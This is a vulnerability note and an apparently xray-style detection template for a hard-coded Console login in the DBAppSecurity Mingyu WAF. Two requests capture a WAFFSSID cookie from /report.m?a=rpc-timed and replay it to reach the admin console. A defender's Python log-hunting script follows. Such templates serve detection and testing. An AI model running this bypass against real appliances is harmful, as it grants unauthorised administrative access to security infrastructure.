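Vulnerability description
The report.php file in the DBAppSecurity (安恒) Mingyu WEB Application Firewall contains a hard-coded login for the Console user. An attacker can use this flaw to log in to the management backend directly.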
id: dbappsecurity-mingyu-report-user-bypass
info:
  name: 明御 WEB 应用防火墙 bypass
  author: 123456
  severity: high
  description: |-
    安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
  tags: dbappsecurity,mingyu,bypass
  created: 2023/09/05
rules:
  # r0: request the report endpoint and capture the WAFFSSID cookie it sets
  r0:
    request:
      method: GET
      path: /report.m?a=rpc-timed
    expression: response.status == 200 && response.body.bcontains(b'error_0x110005')
    output:
      search: '"Set-Cookie: WAFFSSID=(?P<waffssid>.*?);".bsubmatch(response.raw_header)'
      waffssid: search["waffssid"]
  # r1: replay the captured cookie and check that the console page is returned
  r1:
    request:
      method: GET
      path: /
      headers:
        Cookie: "WAFFSSID={{waffssid}}"
    expression: response.status == 200 && response.body.bcontains(b'console') && response.body.bcontains(b'退出') && response.body.bcontains(b'超级管理员')
expression: r0() && r1()
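For defenders, the two requests in the template above translate into a log hunt. The following is an added example, not part of the original template or any vendor tooling: it flags clients that requested the r0 URL and lists the HTTP 200 pages they fetched shortly afterwards. It assumes the management interface's access log is available in combined log format; the function names, the five-minute window and the sample lines are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Assumption: access log lines follow the common/combined log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WINDOW = timedelta(minutes=5)  # assumed correlation window

SAMPLE = [  # constructed log lines using documentation addresses
    '203.0.113.7 - - [05/Sep/2023:10:00:00 +0800] "GET /report.m?a=rpc-timed HTTP/1.1" 200 51',
    '203.0.113.7 - - [05/Sep/2023:10:00:02 +0800] "GET / HTTP/1.1" 200 8342',
    '198.51.100.4 - - [05/Sep/2023:10:01:00 +0800] "GET / HTTP/1.1" 200 8342',
    '192.0.2.9 - - [05/Sep/2023:10:02:00 +0800] "GET /report.m?a=rpc-timed HTTP/1.1" 200 51',
    '192.0.2.9 - - [05/Sep/2023:10:30:00 +0800] "GET / HTTP/1.1" 200 8342',
]


def is_probe(target):
    """True when the request target matches the URL used by rule r0."""
    url = urlsplit(target)
    return url.path == "/report.m" and "rpc-timed" in parse_qs(url.query).get("a", [])


def find_suspects(lines):
    """Return {ip: [targets]} for every client that requested the r0 URL.
    A non-empty list means the client then received HTTP 200 responses
    within WINDOW. Lines are expected in chronological order."""
    probes, hits = {}, {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, target = m["ip"], m["target"]
        if is_probe(target):
            probes[ip] = ts
            hits.setdefault(ip, [])
        elif ip in probes and m["status"] == "200" and ts - probes[ip] <= WINDOW:
            hits[ip].append(target)
    return hits


if __name__ == "__main__":
    for ip, followups in find_suspects(SAMPLE).items():
        print(ip, "follow-up 200s:", followups or "none")
```

Correlation here is by source address because access logs rarely record cookies; where the WAFFSSID value is logged, keying on it is more precise.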